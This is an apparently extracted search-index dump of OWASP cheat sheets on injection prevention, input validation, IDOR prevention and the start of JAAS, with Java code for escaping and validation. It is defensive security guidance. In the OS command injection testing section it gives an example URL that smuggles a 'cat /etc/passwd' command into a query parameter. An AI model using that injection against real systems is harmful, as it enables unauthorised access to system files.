LDAP Injection is an attack used to exploit web-based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. For more information on LDAP Injection attacks, visit LDAP injection.

LDAP injection attacks are common due to two factors:

  1. The lack of safer, parameterized LDAP query interfaces
  2. The widespread use of LDAP to authenticate users to systems.
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue_1","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review_1","title":"During code review","text":"

Please check whether any queries to the LDAP directory escape special characters; see here.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#automated-exploitation_1","title":"Automated Exploitation","text":"

The scanner module of tools like OWASP ZAP includes checks to detect LDAP injection issues.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation_1","title":"Remediation","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#escape-all-variables-using-the-right-ldap-encoding-function","title":"Escape all variables using the right LDAP encoding function","text":"

The main way LDAP stores names is based on DN (distinguished name). You can think of this like a unique identifier. These are sometimes used to access resources, like a username.

A DN might look like this

cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu\n

or

uid=inewton, ou=Mathematics Department, dc=Cambridge, dc=com\n

There are certain characters that are considered special characters in a DN. The exhaustive list is the following: \\ # + < > , ; \" = and leading or trailing spaces

Each DN points to exactly 1 entry, which can be thought of sort of like a row in an RDBMS. For each entry, there will be 1 or more attributes which are analogous to RDBMS columns. If you are interested in searching through LDAP for users with certain attributes, you may do so with search filters. In a search filter, you can use standard boolean logic to get a list of users matching an arbitrary constraint. Search filters are written in Polish notation, AKA prefix notation.

Example:

(&(ou=Physics)(| (manager=cn=Freeman Dyson,ou=Physics,dc=Caltech,dc=edu)\n(manager=cn=Albert Einstein,ou=Physics,dc=Princeton,dc=edu) ))\n

When building LDAP queries in application code, you MUST escape any untrusted data that is added to any LDAP query. There are two forms of LDAP escaping. Encoding for LDAP Search and Encoding for LDAP DN (distinguished name). The proper escaping depends on whether you are sanitizing input for a search filter, or you are using a DN as a username-like credential for accessing some resource.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java_1","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-for-ldap-escaping-example","title":"Safe Java for LDAP escaping Example","text":"
public String escapeDN (String name) {\n//From RFC 2253 and the / character for JNDI\nfinal char[] META_CHARS = {'+', '\"', '<', '>', ';', '/'};\nString escapedStr = new String(name);\n//Backslash is both a Java and an LDAP escape character,\n//so escape it first\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\\\\\\\\",\"\\\\\\\\\\\\\\\\\");\n//Positional characters - see RFC 2253\nescapedStr = escapedStr.replaceAll(\"\\^#\",\"\\\\\\\\\\\\\\\\#\");\nescapedStr = escapedStr.replaceAll(\"\\^ | $\",\"\\\\\\\\\\\\\\\\ \");\nfor (int i=0 ; i < META_CHARS.length ; i++) {\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\" +\nMETA_CHARS[i],\"\\\\\\\\\\\\\\\\\" + META_CHARS[i]);\n}\nreturn escapedStr;\n}\n

Note that the backslash character is both a Java String literal escape character and a regular expression escape character.

public String escapeSearchFilter (String filter) {\n//From RFC 2254\nString escapedStr = new String(filter);\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\\\\\\\\",\"\\\\\\\\\\\\\\\\5c\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\*\",\"\\\\\\\\\\\\\\\\2a\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\(\",\"\\\\\\\\\\\\\\\\28\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\)\",\"\\\\\\\\\\\\\\\\29\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\" +\nCharacter.toString('\\\\u0000'), \"\\\\\\\\\\\\\\\\00\");\nreturn escapedStr;\n}\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#xpath-injection","title":"XPath Injection","text":"

TODO

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#scripting-languages","title":"Scripting languages","text":"

All scripting languages used in web applications have a form of an eval call which receives code at runtime and executes it. If code is crafted using unvalidated and unescaped user input, code injection can occur, which allows an attacker to subvert application logic and eventually gain local access.

Every time a scripting language is used, the actual implementation of the 'higher' scripting language is done using a 'lower' language like C. If the scripting language has a flaw in its data handling code, 'Null Byte Injection' attack vectors can be deployed to gain access to other areas in memory, which results in a successful attack.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#operating-system-commands","title":"Operating System Commands","text":"

OS command injection is a technique used via a web interface in order to execute OS commands on a web server: the user supplies operating system commands through the web interface, and those commands are then executed on the server.

Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue_2","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review_2","title":"During code review","text":"

Check whether any command-execution methods are called and whether unvalidated user input is taken as data for that command.

Outside of that, appending a semicolon to the end of a URL query parameter, followed by an operating system command, will execute the command. %3B is the URL-encoded form of a semicolon. This works because the ; is interpreted as a command separator.

Example: http://sensitive/something.php?dir=%3Bcat%20/etc/passwd

If the application responds with the output of the /etc/passwd file then you know the attack has been successful. Many web application scanners can be used to test for this attack as they inject variations of command injections and test the response.

Equally, Static Code Analysis tools check the data flow of untrusted user input into a web application and check whether the data is then entered into a dangerous method which executes the user input as a command.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation_2","title":"Remediation","text":"

If a call to a system command that incorporates user-supplied data is considered unavoidable, the following two layers of defense should be used within the software in order to prevent attacks:

  1. Parameterization - If available, use structured mechanisms that automatically enforce the separation between data and command. These mechanisms can help to provide the relevant quoting and encoding.
  2. Input validation - the values for commands and their arguments should both be validated. There are different degrees of validation for the actual command and its arguments, as shown in the sketch after the example pattern below:

^[a-z0-9]{3,10}$
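
As an illustrative sketch (the command and method names are hypothetical), argument validation against such a pattern can be combined with the parameterized ProcessBuilder call shown in the correct-usage example below:

import java.io.IOException;\nimport java.util.regex.Pattern;\n\n// Illustrative sketch: validate a user-supplied argument against a strict pattern\n// before passing it, separately from the command, to ProcessBuilder\nprivate static final Pattern ARGUMENT_PATTERN = Pattern.compile(\"^[a-z0-9]{3,10}$\");\n\npublic void runTrustedCommand(String userArgument) throws IOException {\nif (!ARGUMENT_PATTERN.matcher(userArgument).matches()) {\nthrow new IllegalArgumentException(\"Invalid argument\");\n}\nProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", userArgument);\npb.start();\n}\n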

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java_2","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#incorrect-usage","title":"Incorrect Usage","text":"
ProcessBuilder b = new ProcessBuilder(\"C:\\DoStuff.exe -arg1 -arg2\");\n

In this example, the command together with the arguments is passed as one string, making it easy to manipulate that expression and inject malicious strings.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#correct-usage","title":"Correct Usage","text":"

Here is an example that starts a process with a modified working directory. The command and each of the arguments are passed separately. This makes it easy to validate each term and reduces the risk of inserting malicious strings.

ProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", \"TrustedArg1\", \"TrustedArg2\");\nMap<String, String> env = pb.environment();\npb.directory(new File(\"TrustedDir\"));\nProcess p = pb.start();\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#network-protocols","title":"Network Protocols","text":"

Web applications often communicate with network daemons (like SMTP, IMAP, FTP) where user input becomes part of the communication stream. Here it is possible to inject command sequences to abuse an established session.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#injection-prevention-rules","title":"Injection Prevention Rules","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-1-perform-proper-input-validation","title":"Rule #1 (Perform proper input validation)","text":"

Perform proper input validation. Positive or \"allow list\" input validation with appropriate canonicalization is also recommended, but is not a complete defense as many applications require special characters in their input.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-2-use-a-safe-api","title":"Rule #2 (Use a safe API)","text":"

The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful of APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-3-contextually-escape-user-data","title":"Rule #3 (Contextually escape user data)","text":"

If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#other-injection-cheatsheets","title":"Other Injection Cheatsheets","text":"

SQL Injection Prevention Cheat Sheet

OS Command Injection Defense Cheat Sheet

LDAP Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

"},{"location":"cheatsheets/Injection_Prevention_in_Java_Cheat_Sheet.html","title":"Injection Prevention Cheat Sheet in Java","text":"

This information has been moved to the dedicated Java Security CheatSheet

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html","title":"Input Validation Cheat Sheet","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for providing Input Validation security functionality in your applications.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#goals-of-input-validation","title":"Goals of Input Validation","text":"

Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the external party.

Data from all potentially untrusted sources should be subject to input validation, including not only Internet-facing web clients but also backend feeds over extranets, from suppliers, partners, vendors or regulators, each of which may be compromised on their own and start sending malformed data.

Input Validation should not be used as the primary method of preventing XSS, SQL Injection and other attacks which are covered in respective cheat sheets but can significantly contribute to reducing their impact if implemented properly.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#input-validation-strategies","title":"Input validation strategies","text":"

Input validation should be applied at both the syntactic and semantic level.

Syntactic validation should enforce correct syntax of structured fields (e.g. SSN, date, currency symbol).

Semantic validation should enforce correctness of their values in the specific business context (e.g. start date is before end date, price is within expected range).
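
A minimal sketch of such a semantic check (the method and field names are hypothetical):

import java.time.LocalDate;\n\n// Illustrative sketch of a semantic check: the start date must be before the end date\npublic void validateDateRange(LocalDate startDate, LocalDate endDate) {\nif (!startDate.isBefore(endDate)) {\nthrow new IllegalArgumentException(\"Start date must be before end date\");\n}\n}\n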

It is always recommended to prevent attacks as early as possible in the processing of the user's (attacker's) request. Input validation can be used to detect unauthorized input before it is processed by the application.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#implementing-input-validation","title":"Implementing input validation","text":"

Input validation can be implemented using any programming technique that allows effective enforcement of syntactic and semantic correctness, for example:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#allow-list-vs-block-list","title":"Allow list vs block list","text":"

It is a common mistake to use block list validation in order to try to detect possibly dangerous characters and patterns like the apostrophe ' character, the string 1=1, or the <script> tag, but this is a massively flawed approach as it is trivial for an attacker to bypass such filters.

Plus, such filters frequently prevent authorized input, like O'Brian, where the ' character is fully legitimate. For more information on XSS filter evasion please see this wiki page.

Allow list validation is appropriate for all input fields provided by the user. Allow list validation involves defining exactly what IS authorized, and by definition, everything else is not authorized.

If it's well structured data, like dates, social security numbers, zip codes, email addresses, etc. then the developer should be able to define a very strong validation pattern, usually based on regular expressions, for validating such input.

If the input field comes from a fixed set of options, like a drop down list or radio buttons, then the input needs to match exactly one of the values offered to the user in the first place.
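
A minimal sketch of this exact-match check (the option values and names are hypothetical; Set.of requires Java 9+):

import java.util.Set;\n\n// Illustrative sketch: the submitted value must match one of the options offered to the user\nprivate static final Set<String> ALLOWED_OPTIONS = Set.of(\"STANDARD\", \"EXPRESS\", \"PICKUP\");\n\npublic void validateOption(String value) {\nif (!ALLOWED_OPTIONS.contains(value)) {\nthrow new IllegalArgumentException(\"Unexpected option value\");\n}\n}\n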

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#validating-free-form-unicode-text","title":"Validating free-form Unicode text","text":"

Free-form text, especially with Unicode characters, is perceived as difficult to validate due to a relatively large space of characters that need to be allowed.

It's also free-form text input that highlights the importance of proper context-aware output encoding, and quite clearly demonstrates that input validation is not the primary safeguard against Cross-Site Scripting. If your users want to type an apostrophe ' or a less-than sign < in their comment field, they might have a perfectly legitimate reason for that, and the application's job is to properly handle it throughout the whole life cycle of the data.

The primary means of input validation for free-form text input should be:

References:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#regular-expressions","title":"Regular expressions","text":"

Developing regular expressions can be complicated, and is well beyond the scope of this cheat sheet.

There are lots of resources on the internet about how to write regular expressions, including this site and the OWASP Validation Regex Repository.

When designing regular expression, be aware of RegEx Denial of Service (ReDoS) attacks. These attacks cause a program using a poorly designed Regular Expression to operate very slowly and utilize CPU resources for a very long time.

In summary, input validation should:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#allow-list-regular-expression-examples","title":"Allow List Regular Expression Examples","text":"

Validating a U.S. Zip Code (5 digits plus optional -4)

^\\d{5}(-\\d{4})?$\n

Validating U.S. State Selection From a Drop-Down Menu

^(AA|AE|AP|AL|AK|AS|AZ|AR|CA|CO|CT|DE|DC|FM|FL|GA|GU|\nHI|ID|IL|IN|IA|KS|KY|LA|ME|MH|MD|MA|MI|MN|MS|MO|MT|NE|\nNV|NH|NJ|NM|NY|NC|ND|MP|OH|OK|OR|PW|PA|PR|RI|SC|SD|TN|\nTX|UT|VT|VI|VA|WA|WV|WI|WY)$\n

Java Regex Usage Example:

Example validating the parameter \"zip\" using a regular expression.

private static final Pattern zipPattern = Pattern.compile(\"^\\\\d{5}(-\\\\d{4})?$\");\n\npublic void doPost( HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\ntry {\nString zipCode = request.getParameter( \"zip\" );\nif ( !zipPattern.matcher( zipCode ).matches() ) {\nthrow new YourValidationException( \"Improper zipcode format.\" );\n}\n// do what you want here, after it's been validated ..\n} catch(YourValidationException e ) {\nresponse.sendError( HttpServletResponse.SC_BAD_REQUEST, e.getMessage() );\n}\n}\n

Some Allow list validators have also been predefined in various open source packages that you can leverage. For example:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#client-side-vs-server-side-validation","title":"Client Side vs Server Side Validation","text":"

Be aware that any JavaScript input validation performed on the client can be bypassed by an attacker that disables JavaScript or uses a Web Proxy. Ensure that any input validation performed on the client is also performed on the server.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#validating-rich-user-content","title":"Validating Rich User Content","text":"

It is very difficult to validate rich content submitted by a user. For more information, please see the XSS cheatsheet on Sanitizing HTML Markup with a Library Designed for the Job.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#preventing-xss-and-content-security-policy","title":"Preventing XSS and Content Security Policy","text":"

All user-controlled data must be encoded when returned in the HTML page to prevent the execution of malicious data (e.g. XSS). For example, <script> would be returned as &lt;script&gt;.

The type of encoding is specific to the context of the page where the user controlled data is inserted. For example, HTML entity encoding is appropriate for data placed into the HTML body. However, user data placed into a script would need JavaScript specific output encoding.
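
As a sketch, using the OWASP Java Encoder library (the method name and surrounding markup are illustrative), the same user data would be encoded differently depending on the output context:

import org.owasp.encoder.Encode;\n\n// Illustrative sketch using the OWASP Java Encoder: choose the encoder that matches the output context\npublic String renderComment(String userData) {\n// HTML body context\nString htmlBody = \"<p>\" + Encode.forHtml(userData) + \"</p>\";\n// JavaScript context requires a different encoder\nString script = \"<script>var comment='\" + Encode.forJavaScript(userData) + \"';</script>\";\nreturn htmlBody + script;\n}\n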

Detailed information on XSS prevention here: OWASP XSS Prevention Cheat Sheet

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#file-upload-validation","title":"File Upload Validation","text":"

Many websites allow users to upload files, such as a profile picture. This section helps provide that feature securely.

Check the File Upload Cheat Sheet.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#upload-verification","title":"Upload Verification","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#upload-storage","title":"Upload Storage","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#public-serving-of-uploaded-content","title":"Public Serving of Uploaded Content","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#beware-of-special-files","title":"Beware of \"special\" files","text":"

The upload feature should be using an allow-list approach to only allow specific file types and extensions. However, it is important to be aware of the following file types that, if allowed, could result in security vulnerabilities:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#image-upload-verification","title":"Image Upload Verification","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#email-address-validation","title":"Email Address Validation","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#syntactic-validation","title":"Syntactic Validation","text":"

The format of email addresses is defined by RFC 5321, and is far more complicated than most people realise. As an example, the following are all considered to be valid email addresses:

Properly parsing email addresses for validity with regular expressions is very complicated, although there are a number of publicly available documents on regex.

The biggest caveat on this is that although the RFC defines a very flexible format for email addresses, most real world implementations (such as mail servers) use a far more restricted address format, meaning that they will reject addresses that are technically valid. Although they may be technically correct, these addresses are of little use if your application will not be able to actually send emails to them.

As such, the best way to validate email addresses is to perform some basic initial validation, and then pass the address to the mail server and catch the exception if it rejects it. This means that the application can be confident that its mail server can send emails to any addresses it accepts. The initial validation could be as simple as:
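
A minimal sketch of such basic initial validation (the exact rules shown are an assumption and intentionally loose, since the mail server performs the real check):

// Illustrative sketch of basic initial validation; stricter checking is delegated to the mail server\npublic boolean looksLikeEmailAddress(String address) {\nint at = address.indexOf('@');\n// exactly one @, with non-empty local and domain parts\nif (at <= 0 || at != address.lastIndexOf('@') || at == address.length() - 1) {\nreturn false;\n}\n// domain part restricted to letters, digits, hyphens and dots\nreturn address.substring(at + 1).matches(\"[A-Za-z0-9.-]+\");\n}\n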

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#semantic-validation","title":"Semantic Validation","text":"

Semantic validation is about determining whether the email address is correct and legitimate. The most common way to do this is to send an email to the user, and require that they click a link in the email, or enter a code that has been sent to them. This provides a basic level of assurance that:

The links that are sent to users to prove ownership should contain a token that is:

After validating the ownership of the email address, the user should then be required to authenticate on the application through the usual mechanism.
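
A hedged sketch of generating such an ownership-verification token with a cryptographically secure random source (the class and method names are illustrative assumptions; the token would be stored server side with an expiry and marked single-use):

import java.security.SecureRandom;\nimport java.util.Base64;\n\n//Hypothetical helper generating the verification token emailed to the user\npublic final class EmailVerificationToken {\nprivate static final SecureRandom RANDOM = new SecureRandom();\n\npublic static String newToken() {\n//32 random bytes, URL-safe Base64 encoded; store it server side with an expiry date and a single-use flag\nbyte[] bytes = new byte[32];\nRANDOM.nextBytes(bytes);\nreturn Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);\n}\n}\n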

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#disposable-email-addresses","title":"Disposable Email Addresses","text":"

In some cases, users may not want to give their real email address when registering on the application, and will instead provide a disposable email address. These are publicly available addresses that do not require the user to authenticate, and are typically used to reduce the amount of spam received by users' primary email addresses.

Blocking disposable email addresses is almost impossible, as there are a large number of websites offering these services, with new domains being created every day. There are a number of publicly available lists and commercial lists of known disposable domains, but these will always be incomplete.
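
If such a list is used, a hedged sketch of the domain check could look like the following (the domains shown are illustrative placeholders, not a real list):

import java.util.Set;\n\n//Hypothetical deny-list check for disposable email domains; the set would be loaded\n//from a maintained public or commercial list and will always be incomplete\nprivate static final Set<String> DISPOSABLE_DOMAINS = Set.of(\"example-disposable.test\", \"another-disposable.test\");\n\npublic static boolean isDisposable(String address) {\nint at = address.lastIndexOf('@');\nif (at < 0) {\nreturn false;\n}\nString domain = address.substring(at + 1).toLowerCase();\nreturn DISPOSABLE_DOMAINS.contains(domain);\n}\n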

If these lists are used to block the use of disposable email addresses then the user should be presented with a message explaining why they are blocked (although they are likely to simply search for another disposable provider rather than giving their legitimate address).

If it is essential that disposable email addresses are blocked, then registrations should only be allowed from specifically-allowed email providers. However, if this includes public providers such as Google or Yahoo, users can simply register their own disposable address with them.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#sub-addressing","title":"Sub-Addressing","text":"

Sub-addressing allows a user to specify a tag in the local part of the email address (before the @ sign), which will be ignored by the mail server. For example, if the example.org domain supports sub-addressing, then the following email addresses are equivalent:

Many mail providers (such as Microsoft Exchange) do not support sub-addressing. The most notable provider that does is Gmail, although there are many others that also do.

Some users will use a different tag for each website they register on, so that if they start receiving spam to one of the sub-addresses they can identify which website leaked or sold their email address.

Because it could allow users to register multiple accounts with a single email address, some sites may wish to block sub-addressing by stripping out everything between the + and @ signs. This is not generally recommended, as it suggests that the website owner is either unaware of sub-addressing or wishes to prevent users from identifying them when they leak or sell email addresses. Additionally, it can be trivially bypassed by using disposable email addresses, or simply registering multiple email accounts with a trusted provider.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html","title":"Insecure Direct Object Reference Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Insecure Direct Object Reference (called IDOR from here) occurs when an application exposes a reference to an internal implementation object. Used this way, an IDOR reveals the real identifier and the format or pattern used for the element in the storage backend. The most common example is a record identifier in a storage system such as a database or filesystem, though these are not the only examples.

IDOR is referenced in element A4 of the OWASP Top 10, in the 2013 edition.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#context","title":"Context","text":"

IDOR does not create a direct security issue by itself because it reveals only the format or pattern used for the object identifier. However, depending on the format or pattern in place, IDOR gives an attacker the capacity to mount an enumeration attack, allowing them to probe access to the associated objects.

In an enumeration attack, the attacker builds a collection of valid identifiers using the discovered format or pattern and tests them against the application.

For example:

Imagine an HR application exposing a service accepting employee IDs in order to return employee information, and for which the format or pattern of the employee ID is the following:

EMP-00000\nEMP-00001\nEMP-00002\n...\n

Based on this, an attacker can build a collection of valid IDs from EMP-00000 to EMP-99999.

To be exploited, an IDOR issue must be combined with an Access Control issue, because it's the Access Control issue that \"allows\" the attacker to access the object for which they have guessed the identifier through the enumeration attack.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#additional-remarks","title":"Additional remarks","text":"

From Jeff Williams:

Direct Object Reference is fundamentally an Access Control problem. We split it out to emphasize the difference between URL access control and data layer access control. You can't do anything about the data-layer problems with URL access control. And they're not really input validation problems either. But we see DOR manipulation all the time. If we list only \"Messed-up from the Floor-up Access Control\" then people will probably only put in SiteMinder or JEE declarative access control on URLs and call it a day. That's what we're trying to avoid.

From Eric Sheridan:

An object reference map is first populated with a list of authorized values which are temporarily stored in the session. When the user requests a field (ex: color=654321), the application does a lookup in this map from the session to determine the appropriate column name. If the value does not exist in this limited map, the user is not authorized. Reference maps should not be global (i.e. include every possible value), they are temporary maps/dictionaries that are only ever populated with authorized values.

\"A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter.\"

I'm \"down\" with DOR's for files, directories, etc. But not so much for ALL databases primary keys. That's just insane, like you are suggesting. I think that anytime database primary keys are exposed, an access control rule is required. There is no way to practically DOR all database primary keys in a real enterprise or post-enterprise system.

But, suppose a user has a list of accounts, like a bank where database ID 23456 is their checking account. I'd DOR that in a heartbeat. You need to be prudent about this.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#objective","title":"Objective","text":"

This article proposes an idea to prevent the exposure of real identifiers in a simple, portable, and stateless way because the proposal needs to handle session and session-less application topologies.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#proposition","title":"Proposition","text":"

The proposal uses a hash to replace the direct identifier. This hash is salted with a value defined at the application level to support topologies in which the application is deployed in multi-instance mode, such as in production environments.

Using a hash enables the following properties:

This is the implementation of the utility class that generates the identifier to use for an exchange with the front end:

import javax.xml.bind.DatatypeConverter;\nimport java.io.UnsupportedEncodingException;\nimport java.security.MessageDigest;\nimport java.security.NoSuchAlgorithmException;\n\n/**\n * Handle the creation of the ID that will be sent to the front end\n * in order to prevent IDOR\n */\n\npublic class IDORUtil {\n/**\n     * SALT used for the generation of the HASH of the real item identifier\n     * in order to prevent forging it on the front end side.\n     */\nprivate static final String SALT = \"[READ_IT_FROM_APP_CONFIGURATION]\";\n\n/**\n     * Compute an identifier that will be sent to the front end and be used as the item's\n     * unique identifier on the client side.\n     *\n     * @param realItemBackendIdentifier Identifier of the item on the backend storage\n     *                                  (real identifier)\n     * @return A string representing the identifier to use\n     * @throws UnsupportedEncodingException If the string's bytes cannot be obtained\n     * @throws NoSuchAlgorithmException If the hashing algorithm used is not available\n     */\npublic static String computeFrontEndIdentifier(String realItemBackendIdentifier)\nthrows NoSuchAlgorithmException, UnsupportedEncodingException {\nString frontEndId = null;\nif (realItemBackendIdentifier != null && !realItemBackendIdentifier.trim().isEmpty()) {\n//Prefix the value with the SALT\nString tmp = SALT + realItemBackendIdentifier;\n//Get and configure message digester\n//We use SHA1 here for the following reasons, even though SHA1 now has potential collisions:\n//1. We do not store sensitive information, just a technical ID\n//2. We want the ID to stay short but not guessable\n//3. We want a maximum of backend storage systems to support the algorithm used in order to compute it in selection queries/requests\n//If your backend storage supports SHA256 then use it instead of SHA1\nMessageDigest digester = MessageDigest.getInstance(\"sha1\");\n//Compute the hash\nbyte[] hash = digester.digest(tmp.getBytes(\"utf-8\"));\n//Encode it in HEX\nfrontEndId = DatatypeConverter.printHexBinary(hash);\n}\nreturn frontEndId;\n}\n}\n

This is an example of services using the front-end identifier:

/**\n * Service to list all available movies\n *\n * @return The collection of movies ID and name as JSON response\n */\n@RequestMapping(value = \"/movies\", method = GET, produces = {MediaType.APPLICATION_JSON_VALUE})\npublic Map<String, String> listAllMovies() {\nMap<String, String> result = new HashMap<>();\n\ntry {\nthis.movies.forEach(m -> {\ntry {\n//Compute the front end ID for the current element\nString frontEndId = IDORUtil.computeFrontEndIdentifier(m.getBackendIdentifier());\n//Add the computed ID and the associated item name to the result map\nresult.put(frontEndId, m.getName());\n} catch (Exception e) {\nLOGGER.error(\"Error during ID generation for real ID {}: {}\", m.getBackendIdentifier(),\ne.getMessage());\n}\n});\n} catch (Exception e) {\n//Ensure that in case of error no item is returned\nresult.clear();\nLOGGER.error(\"Error during processing\", e);\n}\n\nreturn result;\n}\n\n/**\n * Service to obtain the information on a specific movie\n *\n * @param id Movie identifier from a front end point of view\n * @return The movie object as JSON response\n */\n@RequestMapping(value = \"/movies/{id}\", method = GET, produces = {MediaType.APPLICATION_JSON_VALUE})\npublic Movie obtainMovieName(@PathVariable(\"id\") String id) {\n\n//Search for the wanted movie information using Front End Identifier\nOptional<Movie> movie = this.movies.stream().filter(m -> {\nboolean match;\ntry {\n//Compute the front end ID for the current element\nString frontEndId = IDORUtil.computeFrontEndIdentifier(m.getBackendIdentifier());\n//Check if the computed ID match the one provided\nmatch = frontEndId.equals(id);\n} catch (Exception e) {\n//Ensure that in case of error no item is returned\nmatch = false;\nLOGGER.error(\"Error during processing\", e);\n}\nreturn match;\n}).findFirst();\n\n//We have marked the Backend Identifier class field as excluded\n//from the serialization\n//So we can send the object to front end through the serializer\nreturn movie.get();\n}\n

This is the value object used:

public class Movie {\n/**\n     * We indicate to serializer that this field must never be serialized\n     *\n     * @see \"https://fasterxml.github.io/jackson-annotations/javadoc/2.5/com/fasterxml/\n     *       jackson/annotation/JsonIgnore.html\"\n     */\n@JsonIgnore\nprivate String backendIdentifier;\n...\n}\n
"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

GitHub repository.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html","title":"JAAS Cheat Sheet","text":""},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#introduction-what-is-jaas-authentication","title":"Introduction - What is JAAS authentication","text":"

Authentication is the process of verifying the identity of a user or another system.

JAAS, as an authentication framework, manages the authenticated user's identity and credentials from login to logout.

The JAAS authentication lifecycle:

  1. Create LoginContext.
  2. Read the configuration file for one or more LoginModules to initialize.
  3. Call LoginContext.initialize() for each LoginModule to initialize.
  4. Call LoginContext.login() for each LoginModule.
  5. If login is successful, call LoginContext.commit(); otherwise call LoginContext.abort() (see the sketch below).
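
A minimal sketch of this lifecycle from the calling side (the stanza name and the AppCallbackHandler class are illustrative assumptions):

import javax.security.auth.login.LoginContext;\nimport javax.security.auth.login.LoginException;\n\n//Hypothetical client-side use of the JAAS lifecycle\ntry {\n//Reads the stanza named \"Stanza1\" from the configuration file and instantiates\n//the LoginModule(s) declared there\nLoginContext loginContext = new LoginContext(\"Stanza1\", new AppCallbackHandler());\n//Triggers LoginModule.login() and, on success, LoginModule.commit();\n//on failure LoginModule.abort() is called and a LoginException is thrown\nloginContext.login();\n//... work with loginContext.getSubject() ...\nloginContext.logout();\n} catch (LoginException e) {\n//Authentication failed\n}\n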
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#configuration-file","title":"Configuration file","text":"

